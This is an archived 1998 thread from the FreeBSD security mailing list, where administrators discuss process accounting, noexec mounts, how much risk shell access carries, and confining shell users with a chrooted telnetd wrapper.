(8.8.8/8.8.8) id DAA10020 for freebsd-security-outgoing; Sat, 29 Aug 1998 03:24:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lohi.clinet.fi (lohi.clinet.fi [194.100.0.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA10015 for ; Sat, 29 Aug 1998 03:24:35 -0700 (PDT) (envelope-from hsu@mail.clinet.fi) Received: from katiska.clinet.fi (katiska.clinet.fi [194.100.0.4]) by lohi.clinet.fi (8.9.1/8.9.0) with ESMTP id NAA18352; Sat, 29 Aug 1998 13:22:39 +0300 (EEST) Received: (from hsu@localhost) by katiska.clinet.fi (8.9.0/8.9.0) id NAA00754; Sat, 29 Aug 1998 13:22:04 +0300 (EEST) From: Heikki Suonsivu MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <13799.54857.992544.259013@katiska.clinet.fi> Date: Sat, 29 Aug 1998 13:22:01 +0300 (EEST) To: Sean Kelly Cc: john , freebsd-security@FreeBSD.ORG Subject: Re: accounting. In-Reply-To: <35E715A7.34C01A22@plutotech.com> References: <199808281908.OAA16685@leonardo.cascss.unt.edu> <35E715A7.34C01A22@plutotech.com> X-Mailer: VM 6.47 under Emacs 19.34.1 Organization: Clinet Ltd, Espoo, Finland Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sean Kelly writes: > > > accounting_enable="YES" > > But this doesn't seem to log the switches used for the program > > Yep ... that'd be a good feature! Add pid and ppid. Without them it is non-trivial to see what, say, that fingerd run "/bin/sh". > --Sean > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Heikki Suonsivu / Clinet Oy / Tekniikantie 12 / FI-02150 Espoo / FINLAND, hsu@clinet.fi mobile +358-40-5519679 work +358-9-43542270 fax -4555276 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 07:06:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA28875 for freebsd-security-outgoing; Sat, 29 Aug 1998 07:06:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA28862 for ; Sat, 29 Aug 1998 07:06:12 -0700 (PDT) (envelope-from myke@ees.com) Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with SMTP id KAA11468; Sat, 29 Aug 1998 10:01:25 -0400 (EDT) (envelope-from myke@ees.com) Date: Sat, 29 Aug 1998 10:01:25 -0400 (EDT) From: Mike Holling X-Sender: myke@phluffy.lm.com To: Andrew McNaughton cc: "Matthew D. Fuller" , "Jan B. Koum " , scex , "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me: > > > Hmm.. you are right, but what will stop an attacker who has > > > freebsd box or has access to one to download the binary? > > > > mount -u -o noexec /home? > > (and /tmp, of course) > > Does this stop an attacker doing something like loading a file as a > library from perl, using code on stdin? A sufficiently skilled attacker will probably always be able to get root once they have shell access on a box. The key is to prevent them from getting to that point in the first place. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 09:20:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA09271 for freebsd-security-outgoing; Sat, 29 Aug 1998 09:20:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [206.107.170.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA09259 for ; Sat, 29 Aug 1998 09:20:24 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Sat, 29 Aug 1998 10:19:23 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma005553; Sat, 29 Aug 98 10:19:05 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.8.8) id KAA03579; Sat, 29 Aug 1998 10:19:30 -0600 (MDT) Date: Sat, 29 Aug 1998 10:19:30 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Mike Holling cc: freebsd-security@FreeBSD.ORG Subject: Re: Shell history In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 29 Aug 1998, Mike Holling wrote: > A sufficiently skilled attacker will probably always be able to get root > once they have shell access on a box. The key is to prevent them from > getting to that point in the first place. That's a broad statement. I won't contest the fact that if users have shell access you are now open to a much larger array of possible attacks (like local SUID buffer overflow attacks and /tmp races), but saying that they will always be able to get root is not an accurate statement. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 29 13:45:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA04815 for freebsd-security-outgoing; Sat, 29 Aug 1998 13:45:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA04809 for ; Sat, 29 Aug 1998 13:45:26 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id PAA05062; Sat, 29 Aug 1998 15:44:30 -0500 (CDT) Received: from luthien-122.isdn.mke.execpc.com(169.207.65.122) by peak.mountin.net via smap (V1.3) id sma005055; Sat Aug 29 15:44:07 1998 Message-Id: <3.0.3.32.19980829153814.0076e548@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Sat, 29 Aug 1998 15:38:14 -0500 To: Paul Hart From: "Jeffrey J. Mountin" Subject: Re: Shell history Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:19 AM 8/29/98 -0600, Paul Hart wrote: >On Sat, 29 Aug 1998, Mike Holling wrote: > >> A sufficiently skilled attacker will probably always be able to get root >> once they have shell access on a box. The key is to prevent them from >> getting to that point in the first place. > >That's a broad statement. I won't contest the fact that if users have >shell access you are now open to a much larger array of possible attacks >(like local SUID buffer overflow attacks and /tmp races), but saying that >they will always be able to get root is not an accurate statement. Much discussion has passed before on the lists concerning the issues brought up in this thread. The best bet for ISP's is not to give shell access unless really needed. Simple enough. Now there are legit users that will want shell and my thought is to give it. Add a surcharge (and live with the complaints) and work out how you want to allow the shell access. I'd say it should be a "sacrifice" machine that isn't running any essential services, has no special privileges to other machines, and should be on it's own segment of the network with remote logging to a secured server. (web servers would need to be handled a bit different, but there are more alternatives there) The tricky part is how to deal with the shell access itself. Creating a chroot environment would take some work, but once done simple to duplicate, but it has been pointed out in the past that chroot has weaknesses, as pointed out in several old threads. Has any work been done to make chroot more absolute? Or is it the implementation of chroot? The following is straightforward: At 05:07 PM 12/31/97 +1100, Daniel O'Callaghan wrote: >On Wed, 31 Dec 1997, Ernie Elu wrote: > >> I know it is not too hard to set up a virtual domain, website, and ftp site >> for a client, but is it possible to have a restricted login? >> >> By that I mean if you have a freebsd system hosting www.xyz.com and the >> client wants to be able to telnet in to hand edit files, is it possible to >> restrict their access to only their home directory and its subdirectories? >> >> Sort of an automated chroot thing you can't bypass I guess. > >Build a chrooted area with /etc, /bin, /usr/bin, /usr/lib, /usr/libexec >files which are necessary. >Change inetd to run telnetd.sh and have telnetd.sh do: > >----- >#!/bin/sh >cd /newroot >/usr/sbin/chroot . exec /usr/libexec/telnetd >----- > >Danny This means that there would be common area for all shell users and I'd wonder if root would be restricted to console and ssh perhaps. As long as there are no problems with someone escaping the chroot or affecting the system outside this environment. This would be the solution. It does add a bit of complexity and means that each user will take up quite a bit more space, but they don't need every binary in the default path. It would be easier to limit the impact than to try to fix every flaw. Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message